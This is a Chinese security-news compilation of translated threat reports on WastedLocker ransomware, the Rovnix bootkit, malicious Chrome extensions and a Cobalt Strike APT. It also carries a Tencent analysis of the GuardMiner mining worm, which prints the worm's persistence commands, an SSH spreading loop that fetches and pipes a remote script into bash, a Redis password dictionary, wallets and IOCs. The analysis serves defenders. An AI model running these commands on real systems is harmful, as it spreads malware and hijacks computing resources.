Broadcom旗下的赛门铁克发现并警告用户:攻击者试图部署WastedLocker勒索软件,对美国公司进行了一系列攻击。这些攻击的最终目标是通过对受害者的大多数计算机和服务器进行加密来削弱受害者的IT基础架构,以要求获得数百万美元的赎金,目前至少有31个组织受到了攻击,这意味着攻击者已经破坏了目标组织的网络,并且正在为勒索软件攻击奠定基础。 是一种相对较新的定向勒索软件,在NCC Group发布之前就已被记录,而赛门铁克正在对受影响的网络进行扩展。WastedLocker被归因于臭名昭著的“Evil Corp”网络犯罪组织,Evil Corp曾与Dridex银行木马和BitPaymer勒索软件相关联,勒索金额高达数千万美元。两名涉嫌参与该组织的俄罗斯男子在美国对他们进行了公开起诉。 这些攻击始于一个名为SocGholish的基于javascript的恶意框架,该框架被追踪到超过150个受到威胁的网站伪装成软件进行更新。一旦攻击者进入了受害者的网络,他们就会使用Cobalt Strike恶意软件和一些非本土工具来盗取身份证件,升级特权,然后在网络中进行移动,以便在多台电脑上部署WastedLocker勒索软件。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:symantec-enterprise-blogs,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

Rovnix Bootkit 恶意软件相关活动分析

今年4月中旬,相关威胁监控系统检测到借助“世界银行与冠状病毒大流行有关的新倡议”的恶意软件,扩展名为 EXE 或 RAR, 在这些文件中有著名的 Rovnix bootkit。虽然利用冠状病毒这一话题进行传播的事情已屡见不鲜,但其使用UAC旁路工具进行了更新,且被用来提供一个与众不同的装载程序的实例却很少见。 这份名为《关于世界银行与冠状病毒pandemic.exe有关的新举措》的文件,是一份自解压的报告,其中列出了easymule.exe和1211.doc。 该文件确实包含有关世界银行一项新计划的信息,并且在元数据中引用了与该组织有关的真实个人作为作者。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:securelist,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

Chrome 恶意扩展窃取个人资料,已被下载超 3 千万次

谷歌的 Chrome Web Store 受到迄今为止规模最大的监视活动的打击。截止 2020 年 5 月,该活动通过下载超过 3200 万次的恶意扩展程序成功窃取了来自全球用户的数据。 Awake 安全威胁研究团队发布了一份研究报告指出,其发现了一个大规模的全球监视活动,该活动利用 Internet 域注册和浏览器功能的性质来监视和窃取来自多个地区和行业细分市场的用户的数据。研究表明,此犯罪活动是由单个 Internet 域注册商:CommuniGal Communication Ltd. (GalComm) 促进的。 并表示, 通过利用作为域名注册商的信任,GalComm 已启用了恶意活动,且该恶意活动已在检查的一百多个网络中被发现。此外,即使在网络安全方面进行了大量投资的复杂组织中,恶意活动也能够通过绕过多层安全控制措施而得以隐藏。 Awake 在报告中指出,通过 GalComm 注册的可访问域有 26,079 个,其中超过 15,000 个域为恶意或可疑。 仅在过去的三个月中,其就使用 GalComm 域收集了 111 个恶意或伪造的 Chrome 扩展程序,这些域用于攻击者的命令和控制基础结构和/或用作扩展程序的加载程序页面。这些扩展名可以截取屏幕截图、读取剪贴板、获取存储在 cookie 或参数中的凭据令牌,以及获取用户的击键(例如密码)等。 引诱安装恶意 Chrome 扩展程序的示例 截止 2020 年 5 月,这 111 个恶意扩展下载次数已达到 32,962,951 次。Awake 表示,该公司已与 Google 合作,着手从 Chrome 网上应用店中删除这些扩展程序。 针对此事,GalComm 负责人 Moshe Fogel 在与路透社的通信中则指出,“GalСomm 不参与任何恶意活动,可以说恰恰相反,我们与执法和安全机构合作,尽我们所能防止”。在 Awake Security 发表报告并列出所有可疑域名后, Moshe Fogel 也表示这些域名使用情况几乎都不活跃,并会继续调查其他域名。 有关报告的更多详细信息可查看:https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/   (稿源:cnBeta,封面源自网络。)

GuardMiner 挖矿木马近期活跃,具备蠕虫化主动攻击能力,已有较多企业中招

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/-nUrNilr-iq7kbmopaqXwA   概述 腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃,该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞,并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1,init.sh,恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard,腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner。因该病毒已具备蠕虫化主动攻击扩散的能力,近期已有较多企业中招。 样本分析 1、init.ps1攻击Windows系统,从服务器下载挖矿进程phpupdate.exe,配置文件config.json,扫描攻击进程networkmanager.exe,持久化脚本newdat.ps1,挖矿守护进程phpguard.exe,清理脚本clean.bat。 2、init.sh攻击Linux系统,从服务器下载挖矿进程phpupdate,配置文件config.json,持久化脚本newdat.sh,扫描攻击进程networkmanager,挖矿守护进程phpuguard。 3、门罗币挖矿进程phpupdate.exe占用CPU接近100%: 挖矿使用的三组矿池和钱包分别如下: xmr.f2pool.com:13531 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 xmr-eu2.nanopool.org:14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 randomxmonero.hk.nicehash.com:3380 3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520 4、清除竞品挖矿木马文件: 5、phpguard.exe、phpguard负责守护挖矿进程,进程退出后立即重启: 6、在Windows系统上通过安装计划任务持久化,每隔30分钟执行一次newdat.ps1: SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1" /MO 30 /F 在Linux系统上通过定时任务持久化,每隔30分钟执行一次newdat.sh: crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1"   7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP,建立SSH连接并执行远程shell脚本is.sh,进行内网扩散攻击: `if [ -f /root/.sshown_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘curl -o-  http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null 2>&1 &’ & done fi` is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描,并通过Redis弱口令爆破(密码字典:redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin)以及未授权访问漏洞感染执行init.sh: 8、Windows系统上执行networkmanager.exe,Linux系统上执行networkmanager,开启漏洞扫描和利用攻击,针对以下服务器组件,攻击成功后在Windows系统执行Powershell脚本,在Linux系统执行shell脚本进行进行感染:Redis未授权访问漏洞; Drupal框架CVE-2018-7600漏洞; Hadoop未授权漏洞; Spring框架CVE-2018-1273漏洞; thinkphp框架TP5高危漏洞; WebLogic框架CVE-2017-10271漏洞; SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞; Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。   病毒清除建议: 1.Windows系统用户推荐使用腾讯T-sec终端安全管理系统(腾讯御点)查杀; 2.Linux系统用户可按以下步骤手动清除: a.检查tmp、etc目录下是否具有以下文件,杀死对应的进程并删除文件: /tmp/phpupdate /tmp/networkmanager /tmp/phpguard /tmp/newdat.sh /tmp/config.json /etc/phpupdate /etc/networkmanager /etc/config.json /etc/newdat.sh b.检查crontab计划任务中是否包含执行”/tmp/newdat.sh”相关代码,如有删除该定时任务。 IOCs IP 185.247.117.64 209.182.218.161 178.157.91.26 146.71.79.230 43.245.222.57 URL http[:]//185.247.117.64/cf67355/phpupdate http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate http[:]//185.247.117.64/cf67355/newdat.sh http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager http[:]//185.247.117.64/cf67355/phpguard http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard http[:]//185.247.117.64/cf67355/phpupdate.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager.exe http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe http[:]//185.247.117.64/cf67355/newdat.ps1 http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1 http[:]//185.247.117.64/cf67355/phpguard.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe http[:]//185.247.117.64/cf67355/clean.bat http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat    

多阶段 APT 攻击使用 C2 功能降低 Cobalt Strike

6月10日,我们发现了一个伪装成简历的恶意Word文档,它使用模板注入来删除一个Net Loader。这是我们认为是APT攻击的一个部分,在最后阶段,威胁者使用Cobalt Strike的C2特性下载最终的有效载荷并执行C2通信。 这次袭击因为它的躲避技巧显得特别聪明。如我们观察到在执行来自恶意Word宏的有效负载时存在故意延迟。此外,通过将shell代码隐藏在一个无害的 JavaScript中并在不触及磁盘的情况下加载它,APT可以进一步阻止安全检测。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:malwarebyte,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接